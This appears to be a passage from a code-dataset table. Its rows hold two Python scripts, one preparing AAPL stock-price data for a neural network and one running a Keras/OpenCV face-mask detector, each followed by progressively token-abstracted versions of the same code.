index (int64, 0–100k) | blob_id (stringlengths 40–40) | code (stringlengths 7–7.27M) | steps (sequencelengths 1–1.25k) | error (bool, 2 classes) |
---|---|---|---|---|
99,800 | 9e954089adab72a0d6e4434acfaaed67ad11f7e5 | import numpy as np
import utils.data as dt
import params
from sample_06 import x_returns_train
np.random.seed(123)
''' Model management'''
save_model = True
''' Input parameters '''
symbol = 'AAPL'
look_back = 15 #15
look_ahead = 1
train_size = 0.8
randomize_data = False
''' Hyper parameters '''
epochs = 20
validation_split=0.1 # part of the training set
batch_size = 64
alpha = 3.0
''' Loading data '''
df = dt.load_data(params.global_params['db_path'], symbol, index_col='date')
df = df[['open', 'high', 'low', 'close']]
''' Preparing data - Inline data as input parameters '''
data = df.values
train_rows = int(data.shape[0]*train_size)
train_data = data[:train_rows]
test_data = data[train_rows:]
test_dates = df.index.values[train_rows+look_back:]
x_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)
x_returns_train = dt.stack(train_data[:, 5], look_back=look_back, look_ahead=look_ahead)
x_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=look_ahead)
''' Randomize train data '''
if(randomize_data):
    shuffled = list(np.random.permutation(x_close_train.shape[0]))
    x_close_train = x_close_train[shuffled]
    x_open_train = x_open_train[shuffled]
    x_high_train = x_high_train[shuffled]
    y_train = y_train[shuffled]
''' Reshape data for model '''
x_close_train = np.reshape(x_close_train, (x_close_train.shape[0], x_close_train.shape[1]))
x_close_test = np.reshape(x_close_test, (x_close_test.shape[0], x_close_test.shape[1]))
x_open_train = np.reshape(x_open_train, (x_open_train.shape[0], x_open_train.shape[1]))
x_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.shape[1]))
x_high_train = np.reshape(x_high_train, (x_high_train.shape[0], x_high_train.shape[1]))
x_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.shape[1]))
x_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.shape[1]))
x_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))
x_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0], x_returns_train.shape[1]))
x_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0], x_returns_test.shape[1]))
x_train = np.hstack((x_open_train, x_high_train, x_low_train))
x_test = np.hstack((x_open_test, x_high_test, x_low_test))
# x_train = np.hstack((x_close_train))
# x_test = np.hstack((x_close_test))
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))
y_train = np.reshape(y_train, (y_train.shape[0], 1))
y_test = np.reshape(y_test, (y_test.shape[0], 1))
print('x_train.shape', x_train.shape)
print('x_test.shape', x_test.shape)
| [
"import numpy as np\nimport utils.data as dt\nimport params\nfrom sample_06 import x_returns_train\n\nnp.random.seed(123)\n''' Model management'''\nsave_model = True\n\n''' Input parameters '''\nsymbol = 'AAPL'\nlook_back = 15 #15\nlook_ahead = 1\ntrain_size = 0.8\nrandomize_data = False\n\n''' Hyper parameters '''\nepochs = 20\nvalidation_split=0.1 # part of the training set\nbatch_size = 64\nalpha = 3.0\n\n''' Loading data '''\ndf = dt.load_data(params.global_params['db_path'], symbol, index_col='date')\ndf = df[['open', 'high', 'low', 'close']]\n\n''' Preparing data - Inline data as input parameters '''\n\ndata = df.values\ntrain_rows = int(data.shape[0]*train_size)\n\ntrain_data = data[:train_rows]\ntest_data = data[train_rows:]\ntest_dates = df.index.values[train_rows+look_back:]\n\nx_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3], look_back=look_back, look_ahead=look_ahead, alpha=alpha)\n\nx_returns_train = dt.stack(train_data[:, 5], look_back=look_back, look_ahead=look_ahead)\nx_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=look_ahead)\n\n''' Randomize train data '''\nif(randomize_data):\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n\n''' Reshape data for model '''\nx_close_train = np.reshape(x_close_train, (x_close_train.shape[0], x_close_train.shape[1]))\nx_close_test = np.reshape(x_close_test, (x_close_test.shape[0], x_close_test.shape[1]))\n\nx_open_train = np.reshape(x_open_train, (x_open_train.shape[0], x_open_train.shape[1]))\nx_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.shape[1]))\n\nx_high_train = np.reshape(x_high_train, (x_high_train.shape[0], x_high_train.shape[1]))\nx_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.shape[1]))\n\nx_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.shape[1]))\nx_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))\n\nx_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0], x_returns_train.shape[1]))\nx_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0], x_returns_test.shape[1]))\n\nx_train = np.hstack((x_open_train, x_high_train, x_low_train))\nx_test = np.hstack((x_open_test, x_high_test, x_low_test))\n\n# x_train = np.hstack((x_close_train))\n# x_test = np.hstack((x_close_test))\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 
1))\n\ny_train = np.reshape(y_train, (y_train.shape[0], 1))\ny_test = np.reshape(y_test, (y_test.shape[0], 1))\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"import numpy as np\nimport utils.data as dt\nimport params\nfrom sample_06 import x_returns_train\nnp.random.seed(123)\n<docstring token>\nsave_model = True\n<docstring token>\nsymbol = 'AAPL'\nlook_back = 15\nlook_ahead = 1\ntrain_size = 0.8\nrandomize_data = False\n<docstring token>\nepochs = 20\nvalidation_split = 0.1\nbatch_size = 64\nalpha = 3.0\n<docstring token>\ndf = dt.load_data(params.global_params['db_path'], symbol, index_col='date')\ndf = df[['open', 'high', 'low', 'close']]\n<docstring token>\ndata = df.values\ntrain_rows = int(data.shape[0] * train_size)\ntrain_data = data[:train_rows]\ntest_data = data[train_rows:]\ntest_dates = df.index.values[train_rows + look_back:]\nx_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_returns_train = dt.stack(train_data[:, 5], look_back=look_back,\n look_ahead=look_ahead)\nx_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=\n look_ahead)\n<docstring token>\nif randomize_data:\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n<docstring token>\nx_close_train = np.reshape(x_close_train, (x_close_train.shape[0],\n x_close_train.shape[1]))\nx_close_test = np.reshape(x_close_test, (x_close_test.shape[0],\n x_close_test.shape[1]))\nx_open_train = np.reshape(x_open_train, (x_open_train.shape[0],\n x_open_train.shape[1]))\nx_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.\n shape[1]))\nx_high_train = np.reshape(x_high_train, (x_high_train.shape[0],\n x_high_train.shape[1]))\nx_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.\n shape[1]))\nx_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.\n shape[1]))\nx_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))\nx_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0],\n x_returns_train.shape[1]))\nx_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0],\n x_returns_test.shape[1]))\nx_train = np.hstack((x_open_train, x_high_train, x_low_train))\nx_test = np.hstack((x_open_test, x_high_test, x_low_test))\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\ny_train = np.reshape(y_train, (y_train.shape[0], 1))\ny_test = np.reshape(y_test, (y_test.shape[0], 1))\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"<import token>\nnp.random.seed(123)\n<docstring token>\nsave_model = True\n<docstring token>\nsymbol = 'AAPL'\nlook_back = 15\nlook_ahead = 1\ntrain_size = 0.8\nrandomize_data = False\n<docstring token>\nepochs = 20\nvalidation_split = 0.1\nbatch_size = 64\nalpha = 3.0\n<docstring token>\ndf = dt.load_data(params.global_params['db_path'], symbol, index_col='date')\ndf = df[['open', 'high', 'low', 'close']]\n<docstring token>\ndata = df.values\ntrain_rows = int(data.shape[0] * train_size)\ntrain_data = data[:train_rows]\ntest_data = data[train_rows:]\ntest_dates = df.index.values[train_rows + look_back:]\nx_close_train, y_train = dt.normalize(train_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_close_test, y_test = dt.normalize(test_data[:, 3], look_back=look_back,\n look_ahead=look_ahead, alpha=alpha)\nx_open_train, _ = dt.normalize(train_data[:, 0], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_open_test, _ = dt.normalize(test_data[:, 0], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_train, _ = dt.normalize(train_data[:, 1], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_high_test, _ = dt.normalize(test_data[:, 1], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_train, _ = dt.normalize(train_data[:, 2], ref_data=train_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_low_test, _ = dt.normalize(test_data[:, 2], ref_data=test_data[:, 3],\n look_back=look_back, look_ahead=look_ahead, alpha=alpha)\nx_returns_train = dt.stack(train_data[:, 5], look_back=look_back,\n look_ahead=look_ahead)\nx_returns_test = dt.stack(test_data[:, 5], look_back=look_back, look_ahead=\n look_ahead)\n<docstring token>\nif randomize_data:\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n<docstring token>\nx_close_train = np.reshape(x_close_train, (x_close_train.shape[0],\n x_close_train.shape[1]))\nx_close_test = np.reshape(x_close_test, (x_close_test.shape[0],\n x_close_test.shape[1]))\nx_open_train = np.reshape(x_open_train, (x_open_train.shape[0],\n x_open_train.shape[1]))\nx_open_test = np.reshape(x_open_test, (x_open_test.shape[0], x_open_test.\n shape[1]))\nx_high_train = np.reshape(x_high_train, (x_high_train.shape[0],\n x_high_train.shape[1]))\nx_high_test = np.reshape(x_high_test, (x_high_test.shape[0], x_high_test.\n shape[1]))\nx_low_train = np.reshape(x_low_train, (x_low_train.shape[0], x_low_train.\n shape[1]))\nx_low_test = np.reshape(x_low_test, (x_low_test.shape[0], x_low_test.shape[1]))\nx_returns_train = np.reshape(x_returns_train, (x_returns_train.shape[0],\n x_returns_train.shape[1]))\nx_returns_test = np.reshape(x_returns_test, (x_returns_test.shape[0],\n x_returns_test.shape[1]))\nx_train = np.hstack((x_open_train, x_high_train, x_low_train))\nx_test = np.hstack((x_open_test, x_high_test, x_low_test))\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\ny_train = np.reshape(y_train, (y_train.shape[0], 1))\ny_test = np.reshape(y_test, (y_test.shape[0], 1))\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"<import token>\nnp.random.seed(123)\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\nif randomize_data:\n shuffled = list(np.random.permutation(x_close_train.shape[0]))\n x_close_train = x_close_train[shuffled]\n x_open_train = x_open_train[shuffled]\n x_high_train = x_high_train[shuffled]\n y_train = y_train[shuffled]\n<docstring token>\n<assignment token>\nprint('x_train.shape', x_train.shape)\nprint('x_test.shape', x_test.shape)\n",
"<import token>\n<code token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<docstring token>\n<code token>\n<docstring token>\n<assignment token>\n<code token>\n"
] | false |
99,801 | a57eafb42d73717c90056116e3d0bf705b4a5722 | import os
import shutil
import cv2
from keras.models import load_model
import numpy as np
from keras.preprocessing.image import load_img, img_to_array
# load model # Accuracy=99.3 , validation Accuracy = 99.3 # heavy model, size =226MB
model = load_model('trainedmodel.h5')
print(" Enter a option ")
print(" 1. Detect Mask using image")
print(" 2. Detect Mask using live video")
a=input("Press 1 / 2 : ")
if a==2:
    # model accept below hight and width of the image
    img_width, img_hight = 224, 224
    direc="faces"
    a=0o777
    # model accept below hight and width of the image
    img_width, img_hight = 200, 200
    # ......................................
    # Load the Cascade face Classifier
    face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + "haarcascade_frontalface_default.xml")
    # startt web cam
    cap = cv2.VideoCapture(0) # for webcam
    # cap = cv2.VideoCapture('videos/Mask - 34775.mp4') # for video
    img_count_full = 0
    # parameters for text
    # font
    font = cv2.FONT_HERSHEY_SIMPLEX
    # org
    org = (1, 1)
    class_lable = ' '
    # fontScale
    fontScale = 1 # 0.5
    # Blue color in BGR
    color = (255, 0, 0)
    # Line thickness of 2 px
    thickness = 2 # 1
    # sart reading images and prediction
    while True:
        os.mkdir(direc,a)
        img_count_full += 1
        # read image from webcam
        responce, color_img = cap.read()
        # color_img = cv2.imread('sandeep.jpg')
        # if respoce False the break the loop
        if responce == False:
            break
        # Convert to grayscale
        gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)
        # Detect the faces
        faces = face_cascade.detectMultiScale(gray_img, 1.2, 3) # 1.1, 3) for 1.mp4
        # take face then predict class mask or not mask then draw recrangle and text then display image
        img_count = 0
        for (x, y, w, h) in faces:
            org = (x - 10, y - 10)
            img_count += 1
            color_face = color_img[y:y + h, x:x + w] # color face
            cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count), color_face)
            img = load_img('faces/%d%dface.jpg' % (img_count_full, img_count), target_size=(img_width, img_hight))
            img = img_to_array(img) / 255
            img = np.expand_dims(img, axis=0)
            pred_prob = model.predict(img)
            # print(pred_prob[0][0].round(2))
            pred = np.argmax(pred_prob)
            if pred == 0:
                print("User with mask - predic = ", pred_prob[0][0])
                class_lable = "Mask"
                color = (0, 255, 0)
            else:
                print('user not wearing mask - prob = ', pred_prob[0][1])
                class_lable = "No Mask"
                color = (0,0, 255)
            cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)
            # Using cv2.putText() method
            cv2.putText(color_img, class_lable, org, font,
                fontScale, color, thickness, cv2.LINE_AA)
        # display image
        cv2.imshow('LIVE face mask detection', color_img)
        shutil.rmtree(direc)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    # Release the VideoCapture object
    cap.release()
    cv2.destroyAllWindows()
else :
    # model accept below hight and width of the image
    img_width = 200
    img_hight = 200
    # Load the Cascade face Classifier
    face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
    # parameters for text
    # font
    font = cv2.FONT_HERSHEY_SIMPLEX
    # org
    org = (1, 1)
    class_lable = ' '
    # fontScale
    fontScale = 1 # 0.5
    # Blue color in BGR
    color = (255, 0, 0)
    # Line thickness of 2 px
    thickness = 2 # 1
    # read image from webcam
    color_img = cv2.imread('B612_20170324_142650.jpg')
    # Convert to grayscale
    gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)
    # Detect the faces
    faces = face_cascade.detectMultiScale(gray_img,
        scaleFactor=1.2,
        minNeighbors=5,
        flags=cv2.CASCADE_SCALE_IMAGE)
    # take face then predict class mask or not mask then draw recrangle and text then display image
    img_count = 0
    for (x, y, w, h) in faces:
        org = (x - 10, y - 10)
        img_count += 1
        color_face = color_img[y:y + h, x:x + w] # color face
        cv2.imwrite('imgfaces/%dface.jpg' % (img_count), color_face)
        img = load_img('imgfaces/%dface.jpg' % (img_count), target_size=(img_width, img_hight))
        img = img_to_array(img) / 255
        img = np.expand_dims(img, axis=0)
        pred_prob = model.predict(img)
        # print(pred_prob[0][0].round(2))
        pred = np.argmax(pred_prob)
        if pred == 0:
            print("User with mask - predic = ", pred_prob[0][0])
            class_lable = "Mask"
            color = (255, 0, 0)
            cv2.imwrite('faces/with_mask/%dface.jpg' % (img_count), color_face)
            cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)
            # Using cv2.putText() method
            cv2.putText(color_img, class_lable, org, font,
                fontScale, color, thickness, cv2.LINE_AA)
            cv2.imwrite('faces/with_mask/%dmask.jpg' % (img_count), color_img)
        else:
            print('user not wearing mask - prob = ', pred_prob[0][1])
            class_lable = "No Mask"
            color = (0, 255, 0)
            cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)
            # Using cv2.putText() method
            cv2.putText(color_img, class_lable, org, font,
                fontScale, color, thickness, cv2.LINE_AA)
            cv2.imwrite('faces/with_mask/%dno_mask.jpg' % (img_count), color_img)
        # display image
        dim = (600, 600)
        resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)
        cv2.imshow('LIVE face mask detection', resized)
        cv2.waitKey()
        # close all windows
        cv2.destroyAllWindows()
input('Press ENTER to exit')
| [
"import os\nimport shutil\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nfrom keras.preprocessing.image import load_img, img_to_array\n\n# load model # Accuracy=99.3 , validation Accuracy = 99.3 # heavy model, size =226MB\nmodel = load_model('trainedmodel.h5')\n\nprint(\" Enter a option \")\nprint(\" 1. Detect Mask using image\")\nprint(\" 2. Detect Mask using live video\")\na=input(\"Press 1 / 2 : \")\nif a==2:\n # model accept below hight and width of the image\n img_width, img_hight = 224, 224\n direc=\"faces\"\n a=0o777\n # model accept below hight and width of the image\n img_width, img_hight = 200, 200\n\n # ......................................\n # Load the Cascade face Classifier\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\n\n # startt web cam\n cap = cv2.VideoCapture(0) # for webcam\n # cap = cv2.VideoCapture('videos/Mask - 34775.mp4') # for video\n\n img_count_full = 0\n\n # parameters for text\n # font\n font = cv2.FONT_HERSHEY_SIMPLEX\n # org\n org = (1, 1)\n class_lable = ' '\n # fontScale\n fontScale = 1 # 0.5\n # Blue color in BGR\n color = (255, 0, 0)\n # Line thickness of 2 px\n thickness = 2 # 1\n\n # sart reading images and prediction\n while True:\n os.mkdir(direc,a)\n img_count_full += 1\n\n # read image from webcam\n responce, color_img = cap.read()\n # color_img = cv2.imread('sandeep.jpg')\n\n # if respoce False the break the loop\n if responce == False:\n break\n\n # Convert to grayscale\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3) # 1.1, 3) for 1.mp4\n\n # take face then predict class mask or not mask then draw recrangle and text then display image\n img_count = 0\n for (x, y, w, h) in faces:\n org = (x - 10, y - 10)\n img_count += 1\n color_face = color_img[y:y + h, x:x + w] # color face\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count), color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full, img_count), target_size=(img_width, img_hight))\n\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n # print(pred_prob[0][0].round(2))\n pred = np.argmax(pred_prob)\n\n if pred == 0:\n print(\"User with mask - predic = \", pred_prob[0][0])\n class_lable = \"Mask\"\n color = (0, 255, 0)\n\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = \"No Mask\"\n color = (0,0, 255)\n\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n # Using cv2.putText() method\n cv2.putText(color_img, class_lable, org, font,\n fontScale, color, thickness, cv2.LINE_AA)\n\n # display image\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n\n break\n\n\n # Release the VideoCapture object\n cap.release()\n cv2.destroyAllWindows()\nelse :\n # model accept below hight and width of the image\n img_width = 200\n img_hight = 200\n # Load the Cascade face Classifier\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n # parameters for text\n # font\n font = cv2.FONT_HERSHEY_SIMPLEX\n # org\n org = (1, 1)\n class_lable = ' '\n # fontScale\n fontScale = 1 # 0.5\n # Blue color in BGR\n color = (255, 0, 0)\n # Line thickness of 2 px\n thickness = 2 # 1\n\n # read image from webcam\n color_img = cv2.imread('B612_20170324_142650.jpg')\n\n # Convert to grayscale\n gray_img = cv2.cvtColor(color_img, 
cv2.COLOR_BGR2GRAY)\n\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray_img,\n scaleFactor=1.2,\n minNeighbors=5,\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n # take face then predict class mask or not mask then draw recrangle and text then display image\n img_count = 0\n for (x, y, w, h) in faces:\n org = (x - 10, y - 10)\n img_count += 1\n color_face = color_img[y:y + h, x:x + w] # color face\n cv2.imwrite('imgfaces/%dface.jpg' % (img_count), color_face)\n img = load_img('imgfaces/%dface.jpg' % (img_count), target_size=(img_width, img_hight))\n\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n # print(pred_prob[0][0].round(2))\n pred = np.argmax(pred_prob)\n\n if pred == 0:\n print(\"User with mask - predic = \", pred_prob[0][0])\n class_lable = \"Mask\"\n color = (255, 0, 0)\n cv2.imwrite('faces/with_mask/%dface.jpg' % (img_count), color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n # Using cv2.putText() method\n cv2.putText(color_img, class_lable, org, font,\n fontScale, color, thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % (img_count), color_img)\n\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = \"No Mask\"\n color = (0, 255, 0)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n # Using cv2.putText() method\n cv2.putText(color_img, class_lable, org, font,\n fontScale, color, thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dno_mask.jpg' % (img_count), color_img)\n\n # display image\n dim = (600, 600)\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n cv2.imshow('LIVE face mask detection', resized)\n\n cv2.waitKey()\n\n # close all windows\n cv2.destroyAllWindows()\n\ninput('Press ENTER to exit')\n",
"import os\nimport shutil\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nfrom keras.preprocessing.image import load_img, img_to_array\nmodel = load_model('trainedmodel.h5')\nprint(' Enter a option ')\nprint(' 1. Detect Mask using image')\nprint(' 2. Detect Mask using live video')\na = input('Press 1 / 2 : ')\nif a == 2:\n img_width, img_hight = 224, 224\n direc = 'faces'\n a = 511\n img_width, img_hight = 200, 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n cap = cv2.VideoCapture(0)\n img_count_full = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n while True:\n os.mkdir(direc, a)\n img_count_full += 1\n responce, color_img = cap.read()\n if responce == False:\n break\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count),\n color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full,\n img_count), target_size=(img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 0, 255, 0\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 0, 255\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\nelse:\n img_width = 200\n img_hight = 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n color_img = cv2.imread('B612_20170324_142650.jpg')\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.2,\n minNeighbors=5, flags=cv2.CASCADE_SCALE_IMAGE)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('imgfaces/%dface.jpg' % img_count, color_face)\n img = load_img('imgfaces/%dface.jpg' % img_count, target_size=(\n img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 255, 0, 0\n cv2.imwrite('faces/with_mask/%dface.jpg' % img_count, color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % img_count, color_img)\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 255, 0\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n 
